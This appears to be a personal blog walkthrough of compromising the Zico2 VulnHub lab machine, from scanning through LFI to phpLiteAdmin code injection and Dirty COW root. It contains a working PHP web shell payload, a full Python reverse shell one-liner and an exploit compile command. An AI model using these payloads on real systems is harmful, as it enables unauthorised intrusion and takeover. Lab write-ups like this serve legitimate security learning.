Muzec's Cyber Security Blog

Hack. Sleep. Repeat

View on GitHub

image

So i was also hitting all the OSCP like Box on Vulnhubs Damn guys guess what?? am really getting my A** kick like a lot lol so let get started today the box is Zico2 which can be easily download here https://www.vulnhub.com/entry/zico2-1,210/ .

We always start with an nmap scan…..

Nmap -sC -sV -oA nmap <Target-IP>

# Nmap 7.91 scan initiated Thu May  6 15:40:41 2021 as: nmap -p- -sC -sV -oA nmap 172.16.139.170
Nmap scan report for 172.16.139.170
Host is up (0.00020s latency).
Not shown: 65531 closed ports
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 68:60:de:c2:2b:c6:16:d8:5b:88:be:e3:cc:a1:25:75 (DSA)
|   2048 50:db:75:ba:11:2f:43:c9:ab:14:40:6d:7f:a1:ee:e3 (RSA)
|_  256 11:5d:55:29:8a:77:d8:08:b4:00:9b:a3:61:93:fe:e5 (ECDSA)
80/tcp    open  http    Apache httpd 2.2.22 ((Ubuntu))
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: Zico's Shop
111/tcp   open  rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          35483/udp6  status
|   100024  1          35727/udp   status
|   100024  1          49061/tcp   status
|_  100024  1          52842/tcp6  status
49061/tcp open  status  1 (RPC #100024)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu May  6 15:40:59 2021 -- 1 IP address (1 host up) scanned in 18.38 seconds

4 open ports we already know we are hitting port 80 first let see what we have on the web page.

image

Looking around we found a page with a LFI vulnerability.

image

Not going to lie i spend hours trying to get it from LFI to RCE but no luck so i decided to burst some directory.

image

And http://172.16.139.170/dbadmin/ look interesting let check it out.

image

So i click on test_db.php.

image

And boom a phpLiteAdmin admin page a quick google search give us the default password to log in.

image

Let try using it to log in.

image

Boom we have access to the phpLiteAdmin admin page and also found some sweet credentials.

image

So i cracl it thinking it the way to get acess to SSH but nop just a rabbit hole.

image

So back to the phpLiteAdmin admin page since we know the version i try checking for any available exploit using searchsploit.

image

Hmm the Remote PHP Code Injection look interesting since it match our version.

image

Ok let follow it.

image

Now let click on the new created database.

image

image

Now let create a table for it.

image

Default Value <?php echo system($_GET["cmd"]); ?> and click on create.

image

Now going back to the LFI page to access it.

image

AHhhh nice adding our parameter to the back boom we have command injection.

image

Now let get a reverse shell back to our terminal. Reverse Shell Cheat Sheet

we be using the python reverse shell script python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Note:- do change the IP and port also start an Ncat listener.

image

And we have shell.

image

let Spawn a TTY shell. Spawning A TTY Shell

image

Privilege Escalation

First thing to check was the version.

image

Yea it pretty Old so i run linux-exploit-suggester to find some exploit.

image

Cool dirtycow 2 so i download the exploit to my machine and transfer it to the target box.

image

Now let complie and run the exploit.

gcc -pthread 40839.c -o dirty -lcrypt

image

image

Now let run it.

image

image

And we are root…

image

GOT STUCK A LOT BUT GUESS WHAT WE LEARN EVERYDAY

Greeting From Muzec



Back To Home